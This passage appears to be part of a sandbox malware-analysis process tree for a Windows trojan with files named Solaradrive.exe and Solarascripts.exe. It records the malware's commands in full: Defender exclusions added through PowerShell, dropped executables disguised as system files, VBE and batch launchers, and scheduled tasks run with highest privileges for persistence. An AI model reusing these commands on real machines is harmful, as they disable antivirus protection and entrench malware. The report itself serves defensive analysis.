                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\smss.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1312
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\lsass.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5204
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\sysmon.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4764
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\SearchApp.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3192
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5572
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\mui\0422\powershell.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5212
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\powershell.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6060
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sppsvc.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:6136
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\SppExtComObj.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5196
                                                            • C:\mswebFonthost\lsass.exe
                                                              "C:\mswebFonthost\lsass.exe"
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              PID:2632
                                                • C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe"
                                                  4⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4844
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\providerWebFont\rp9B7DqmQLcraqXwEvd0Obt7HxyhXRo2XNrbvC.vbe"
                                                    5⤵
                                                    • Checks computer location settings
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4964
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\providerWebFont\J8q9PLSI7w6bLMkKpRLxNzvjn.bat" "
                                                      6⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4492
                                                      • C:\providerWebFont\MsPortserver.exe
                                                        "C:\providerWebFont/MsPortserver.exe"
                                                        7⤵
                                                        • Modifies WinLogon for persistence
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1684
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mxtf0ywb\mxtf0ywb.cmdline"
                                                          8⤵
                                                            PID:5724
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D33.tmp" "c:\Surrogateprovidercomponentsessionmonitor\CSCCEC5C5E5F46340409BB67143211E2AFD.TMP"
                                                              9⤵
                                                                PID:5964
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xjoidqlf\xjoidqlf.cmdline"
                                                              8⤵
                                                                PID:6108
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6002.tmp" "c:\mswebFonthost\CSC6128A16094484B0F9CCFECD3F65CF9D9.TMP"
                                                                  9⤵
                                                                    PID:5124
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2rfw12k\q2rfw12k.cmdline"
                                                                  8⤵
                                                                    PID:5260
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61D7.tmp" "c:\mswebFonthost\CSC787475D8C1034D34B66802397F6A217.TMP"
                                                                      9⤵
                                                                        PID:5540
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a1ng1hyt\a1ng1hyt.cmdline"
                                                                      8⤵
                                                                        PID:5560
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6283.tmp" "c:\Program Files\Windows Sidebar\Gadgets\CSC53B5EB11EF1A41F5B2F551D3F39A439E.TMP"
                                                                          9⤵
                                                                            PID:5736
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aadzhyi\0aadzhyi.cmdline"
                                                                          8⤵
                                                                            PID:4640
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES638C.tmp" "c:\Users\Admin\Saved Games\CSC19769348B0AF4C6A948CEADD48FE5EF3.TMP"
                                                                              9⤵
                                                                                PID:6004
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\keyv4id5\keyv4id5.cmdline"
                                                                              8⤵
                                                                                PID:4408
                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65FD.tmp" "c:\Program Files\Google\CSCE3B84D3553A247CDA7AFCBDAB3FBF811.TMP"
                                                                                  9⤵
                                                                                    PID:5488
                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mjoowept\mjoowept.cmdline"
                                                                                  8⤵
                                                                                  • Drops file in System32 directory
                                                                                  PID:5416
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES668A.tmp" "c:\Windows\System32\CSC6B999808C80A4AC3ADE4C684EEA47F4B.TMP"
                                                                                    9⤵
                                                                                      PID:2068
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qRcaTPU0Bh.bat"
                                                                                    8⤵
                                                                                      PID:4824
                                                                                      • C:\Windows\system32\chcp.com
                                                                                        chcp 65001
                                                                                        9⤵
                                                                                          PID:6096
                                                                                        • C:\Windows\system32\PING.EXE
                                                                                          ping -n 10 localhost
                                                                                          9⤵
                                                                                          • Runs ping.exe
                                                                                          PID:1392
                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                          9⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          PID:5636
                                                                                          • C:\Users\Admin\AppData\Local\RuntimeBroker.exe.exe
                                                                                            "C:\Users\Admin\AppData\Local\RuntimeBroker.exe.exe"
                                                                                            10⤵
                                                                                            • Modifies WinLogon for persistence
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Modifies registry class
                                                                                            PID:3324
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\de51w5xb\de51w5xb.cmdline"
                                                                                              11⤵
                                                                                                PID:5560
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F2E.tmp" "c:\Users\Admin\AppData\Local\CSC67D00489E2A7479F8EA368643FC36128.TMP"
                                                                                                  12⤵
                                                                                                    PID:3316
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ik0iwsso\ik0iwsso.cmdline"
                                                                                                  11⤵
                                                                                                    PID:812
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FE9.tmp" "c:\mswebFonthost\CSCE5656ECD891B412D88D2A5732BA0BB5C.TMP"
                                                                                                      12⤵
                                                                                                        PID:5676
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nChyZqSuGR.bat"
                                                                                                      11⤵
                                                                                                        PID:5248
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          chcp 65001
                                                                                                          12⤵
                                                                                                            PID:6052
                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                            ping -n 10 localhost
                                                                                                            12⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:3292
                                                                                                          • C:\Users\Admin\AppData\Local\Idle.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Idle.exe"
                                                                                                            12⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2140
                                                                                                      • C:\Users\Admin\AppData\Local\System.exe
                                                                                                        "C:\Users\Admin\AppData\Local\System.exe"
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                        PID:2460
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1684
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\mswebFonthost\bDIv21uOAA97P6b9m4I8TmK.vbe"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            PID:4140
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\mswebFonthost\f2crKrm9LrmP.bat" "
                                                                                              5⤵
                                                                                                PID:5736
                                                                                                • C:\mswebFonthost\Neo.exe
                                                                                                  "C:\mswebFonthost/Neo.exe"
                                                                                                  6⤵
                                                                                                  • Modifies WinLogon for persistence
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Modifies registry class
                                                                                                  PID:5340
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01x32zyy\01x32zyy.cmdline"
                                                                                                    7⤵
                                                                                                      PID:764
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8240.tmp" "c:\providerWebFont\CSC164CF92B98A04636A55426B3688A8B94.TMP"
                                                                                                        8⤵
                                                                                                          PID:5636
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1chwwzf\q1chwwzf.cmdline"
                                                                                                        7⤵
                                                                                                          PID:5092
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82BD.tmp" "c:\Users\Admin\AppData\Local\CSC34E5D65676204DD1B86DE86722C5656E.TMP"
                                                                                                            8⤵
                                                                                                              PID:4244
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0bkutjka\0bkutjka.cmdline"
                                                                                                            7⤵
                                                                                                              PID:3752
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8359.tmp" "c:\Recovery\WindowsRE\CSCBBA6FFB2DD1D4D12A78923C6C2508227.TMP"
                                                                                                                8⤵
                                                                                                                  PID:2200
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s2qfa1fw\s2qfa1fw.cmdline"
                                                                                                                7⤵
                                                                                                                  PID:1572
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D6.tmp" "c:\Users\Public\Downloads\CSC75982BBBF494A0CBD551F17499DE4CD.TMP"
                                                                                                                    8⤵
                                                                                                                      PID:5912
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hot3qm3q\hot3qm3q.cmdline"
                                                                                                                    7⤵
                                                                                                                      PID:1564
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8472.tmp" "c:\Surrogateprovidercomponentsessionmonitor\CSCF050DF05B03A469B97C7F0913259FC29.TMP"
                                                                                                                        8⤵
                                                                                                                          PID:2036
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqqnbigx\lqqnbigx.cmdline"
                                                                                                                        7⤵
                                                                                                                          PID:5816
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES851E.tmp" "c:\mswebFonthost\CSC66217BE54817458EB8348F94B6322A2E.TMP"
                                                                                                                            8⤵
                                                                                                                              PID:452
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kcc5otuu\kcc5otuu.cmdline"
                                                                                                                            7⤵
                                                                                                                              PID:5316
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp" "c:\mswebFonthost\CSC2D627333F7E44245872755F6755C178.TMP"
                                                                                                                                8⤵
                                                                                                                                  PID:5836
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2izwow2u\2izwow2u.cmdline"
                                                                                                                                7⤵
                                                                                                                                  PID:5304
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8656.tmp" "c:\mswebFonthost\CSC21C94F23A7F34CF2BD139898816855.TMP"
                                                                                                                                    8⤵
                                                                                                                                      PID:5216
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\euqdtiyw\euqdtiyw.cmdline"
                                                                                                                                    7⤵
                                                                                                                                      PID:6136
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86E3.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSCBB890E832DDC477384E4D2A48489EBCE.TMP"
                                                                                                                                        8⤵
                                                                                                                                          PID:5588
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m5u1bjo0\m5u1bjo0.cmdline"
                                                                                                                                        7⤵
                                                                                                                                          PID:2888
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8760.tmp" "c:\Users\Default User\CSC7B7020AE9D164F19B1A880769554BFA.TMP"
                                                                                                                                            8⤵
                                                                                                                                              PID:3932
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aaa4lmjn\aaa4lmjn.cmdline"
                                                                                                                                            7⤵
                                                                                                                                              PID:6108
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8906.tmp" "c:\providerWebFont\CSCEE8AAD1D48740EE80FD33AC45E15C3.TMP"
                                                                                                                                                8⤵
                                                                                                                                                  PID:5440
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q9J0KV3FpU.bat"
                                                                                                                                                7⤵
                                                                                                                                                  PID:5268
                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                    chcp 65001
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5940
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                      8⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:5252
                                                                                                                                                    • C:\mswebFonthost\Neo.exe
                                                                                                                                                      "C:\mswebFonthost\Neo.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5160
                                                                                                                                                      • C:\mswebFonthost\Neo.exe.exe
                                                                                                                                                        "C:\mswebFonthost\Neo.exe.exe"
                                                                                                                                                        9⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3692
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Idle.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Idle.exe"
                                                                                                                                                        9⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                        PID:4388
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Surrogateprovidercomponentsessionmonitor\SppExtComObj.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3212
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Surrogateprovidercomponentsessionmonitor\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:452
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Surrogateprovidercomponentsessionmonitor\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1948
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\mswebFonthost\explorer.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4264
                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                        1⤵
                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1436
                                                                                                                                        • C:\Windows\System32\MsiExec.exe
                                                                                                                                          C:\Windows\System32\MsiExec.exe -Embedding 5671EB748F1E166D29A1514B4BD9E274
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:5452
                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 6AD684B2B3AEA9F5618D0FA84615F90F
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:5904
                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding A332EA4C7CC5D396B885B8A3FE57CD85 E Global\MSI0000
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:1932
                                                                                                                                          • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                            "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                            3⤵
                                                                                                                                              PID:3884
                                                                                                                                              • C:\Windows\System32\wevtutil.exe
                                                                                                                                                "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                                4⤵
                                                                                                                                                  PID:1008
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\mswebFonthost\explorer.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2300
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\mswebFonthost\explorer.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5064
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\RuntimeBroker.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2632
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3028
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4424
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\Gadgets\csrss.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:4876
                                                                                                                                          • C:\Windows\system32\schtasks.exe
